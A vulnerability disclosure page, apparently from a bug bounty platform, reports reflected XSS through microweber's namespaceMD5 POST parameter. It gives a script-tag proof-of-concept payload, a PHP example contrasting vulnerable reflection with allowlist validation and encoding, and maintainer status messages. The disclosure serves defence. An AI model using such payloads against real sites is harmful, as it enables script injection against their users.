Post parameter namespaceMD5 is vulnerable to reflected XSS in microweber/microweber
Valid
Reported on Nov 8th 2022
Description
The POST parameter namespaceMD5 is vulnerable to reflected XSS.
Proof of Concept
// POST request to /module with parameters and payload
namespaceMD5=3389dae361af79b04c9c8e7057f60cc6test}'')"><script>alert()</script><script>alert()</script>&module=settings%2Fgroup%2Flanguage_import&id=mw_admin_import_language_modal_content
Impact
JS injection.
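The report shows the parameter being reflected into the response with the trailing `}'')"><script>` sequence intact, which is the signature of an attribute context that is closed by attacker input. The following PHP is an added example written for this page, not microweber's own code: the function names, the modal markup and the `data-namespace` attribute are assumptions. It contrasts the reflection pattern the report describes with a hardened form that rejects anything that is not a 32-character hex digest before use and still HTML-encodes on output, so the result is safe whether the value ends up in normal markup or in a debug error page.

```php
<?php
// Added example for this report (not microweber's code). All names and the
// modal markup below are hypothetical.

// Vulnerable pattern: the value is concatenated into HTML unchanged, so a value
// containing  '')"><script>...  closes the attribute and injects script.
function render_modal_vulnerable(string $namespaceMd5): string
{
    return '<div class="modal" data-namespace="' . $namespaceMd5 . '"></div>';
}

// An MD5 digest is exactly 32 hex characters; anything else is not a valid
// namespace and should never reach the output stage.
function validate_md5_namespace(string $value): ?string
{
    return preg_match('/^[0-9a-f]{32}$/i', $value) === 1 ? $value : null;
}

// Hardened pattern: allowlist validation first, then output encoding. Encoding
// is kept even though validation already excludes quotes and angle brackets,
// so a future caller that skips validation still gets a safe attribute.
function render_modal_hardened(string $namespaceMd5): string
{
    $safe = validate_md5_namespace($namespaceMd5);
    if ($safe === null) {
        // Fail closed with a fixed error string; never echo the rejected input.
        return '<div class="modal" data-error="invalid namespace"></div>';
    }
    return '<div class="modal" data-namespace="'
        . htmlspecialchars($safe, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '"></div>';
}

// Constructed inputs: the report's payload (URL-decoded) and a legitimate digest.
$payload = "3389dae361af79b04c9c8e7057f60cc6test}'')\"><script>alert()</script>";
$legit   = md5('settings/group/language_import');

echo render_modal_vulnerable($payload), PHP_EOL;  // script tag lands in the page
echo render_modal_hardened($payload), PHP_EOL;    // rejected, fixed error markup
echo render_modal_hardened($legit), PHP_EOL;      // 32-hex digest passes through
```

Run it with `php example.php` on any PHP 7.1 or later CLI. The validation step is the important one for a value that is supposed to be a digest: it is cheap, it has no encoding-context pitfalls, and it makes the payload above unrepresentable rather than merely escaped.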
Occurrences
We are processing your report and will contact the microweber team within 24 hours.
2 months ago
We have contacted a member of the microweber team and are waiting to hear back
2 months ago
Hello
This error appears only when you have enabled the debug mode. Currently on the demo site the debug mode is enabled and that's why you see the error.
On user sites and on production sites, the debug mode is not enabled.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Oops sorry, I replied to the wrong vulnerability, checking this now.
The researcher's credibility has increased: +7
Peter Ivanov has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 20th 2022
language_import.php#L32 has been validated